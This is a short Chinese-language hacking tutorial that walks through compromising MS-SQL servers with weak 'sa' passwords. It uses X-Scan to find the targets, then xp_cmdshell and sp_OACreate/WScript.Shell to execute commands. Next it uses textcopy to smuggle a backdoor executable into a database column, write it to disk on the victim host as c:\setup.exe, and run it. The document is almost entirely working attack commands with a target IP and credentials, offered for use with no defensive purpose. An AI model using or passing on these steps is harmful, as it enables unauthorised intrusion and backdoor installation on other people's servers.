sql

 

本例使用textcopy上传后门程序到对方主机，并安装。

准备工具：X-Scan、MS-SQL查询分析器、textcopy（后两个在SQL2000里面有）

步骤：
1、用X-Scan扫描到有sql弱口令的主机

2、用查询分析器连上去
检查sql的版本号：select @@version
检查能否运行程序：exec xp_cmdshell 'cmd /c dir c:\'
检查能否使用WScript.Shell组件：
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object,'Run', NULL, 'net user'

3、上传后门程序到对方主机的数据库里去
textcopy /S 58.59.123.54 /U sa /P sa123 /D pubs /T pub_info /C logo /W "where pub_id=9901" /F d:\tools\mydoor.exe /I

4、在对方主机上把这个后门程序下载下来
先获得对方主机上sql的安装位置：
exec xp_instance_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\MSSQLServer\Setup', 'SQLPath'
下载后门程序：
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object, 'Run', NULL,'"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\textcopy" /S 127.0.0.1 /U sa /P sa123 /D pubs /T pub_info /C logo /W "where pub_id=9901" /F c:\setup.exe /O'

5、运行后门程序
declare @object int
exec sp_OACreate 'WScript.Shell', @object OUT
exec sp_OAMethod @object, 'Run', NULL, 'c:\setup.exe'